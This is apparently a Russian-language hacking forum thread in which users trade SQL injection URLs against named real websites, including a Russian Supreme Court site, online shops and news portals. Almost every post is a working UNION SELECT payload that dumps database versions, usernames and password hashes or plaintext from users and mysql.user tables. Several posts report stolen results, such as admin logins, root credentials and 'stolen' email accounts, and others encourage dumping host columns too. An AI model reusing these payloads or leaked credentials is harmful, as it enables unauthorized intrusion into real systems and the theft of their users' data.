это sybase ODBC. Почитай я создавал темы. А вообще хочешь расковырять тебе на sql.ru синтаксис как mssql.
Code: http://director-online.com/buildArticle.php?id=311+order+by+8 + + Code: http://www.thesop.org/index.php?id=21+order+by+1 + + .pl Code: http://www.mikado.pl/kolowrotek.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*/*
www.cybersquads.ru Code: http://cybersquads.ru/demos/?type=&gametype=&map=&pov=can'+union+select+1,2,3,4,5,version(),7,concat_ws(char(58),login,password),9,10,11+from+users/* login : pass Admin login: unlim Password: qqq1
Code: http://www.celtavigo.net/sections.php?op=viewarticle&artid=-320+union+select+1,2,3,4,5/* Code: http://www.celtavigo.net/sections.php?op=listarticles&secid=-4+union+select+1,2,3,4,5/* Code: http://www.celtavigo.net/article.php?sid=-9296++union+select+1,2,3,4,5,6,7,8/* ничего кроме цифр не получилось
Code: http://www.otadoya.ru/catalog/more/?cat_id=-8+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/*&id=1543 таблиц не нашел ,рядом форум стоит Code: http://ibc-web.ru/portfolio/?id=13' ну собственно сам разроботчик сайта тока вывода нет
а вот и поинтересней Code: http://www.ecotour.ru/viewcountry.php?id=-9+union+select+1,null,concat(user_name,char(58),user_password),4,5+FROM+photo_users/* вроде админка есть Code: http://www.ecotour.by/robots.txt но хз как в нее попасть также акк подходит к Code: http://37.ecotour.by юзайте в итоге угнал 3 мыла хоть и не красивые но зато приятно
Code: http://www.n.kiev.ua/show_club.php?club=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* Code: http://www.n.kiev.ua/show_club.php?club=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+news/* нашел только таблицу news . . .
Code: http://scriptmagix.com/index.php?cmd=2&id=-1+union+select+1,concat(username,0x3a,password),3,4,5,6,7+from+admin+limit+1,1/* ^^
www.dvdcdtorg.ru Code: http://www.dvdcdtorg.ru/?pageId=1&catId=-13+union+select+1,2,concat_ws(char(58,58),version(),database(),user()),4,5,6,7,8/* www.mfun.ru Code: http://www.mfun.ru/music/melody/play.php?melodyid=-1+union+select+1,concat_ws(char(58,58),version(),database(),user()),3,4/* www.notaryclub.ru Есть таблица : ccforum_users Колонки не нашел =) Версия mysql: 5 Code: http://notaryclub.ru/users.php?op=show&uid=-5+union+select+1,2,3,4,concat_ws(char(58,58),version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* Верховный суд Российской Федерации Имеются таблицы: 1)users: Колонки: нашел только password 2)user: user : password Code: http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58),user,password)+using+cp1251)+from+mysql.user/* MySQL info Code: http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58,58),version(),database(),user())+using+cp1251)+from+users/*
To Isis Code: http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58),user,pa ssword)+using+cp1251)+from+mysql.user/* расшифровывается так: root:root axmet:ax
http://www.marumi-filter.ru/shop/?id=74'+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1, 2/* http://www.sexshop-romantic.ro/sex-shop/?id=-26+union+select+1,2,3/* - 3 версия( http://www.bomdiggy.com/readColumn.php?id=-43+union+select+1,2,version(),4,5,6,7,8+from+users/*
К тем кто выкладывает скули с доступом к базе mysql, выводите не только колонки user и password, а ещё и host
http://www.greenshift.com/news.php?id=-134+union+select+1,password,3,4,5,6,7,8,9,10,11,12%20+from+mysql.user/* http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-9%20union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* http://www.almaz-antey.ru/news.php?id=-115+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*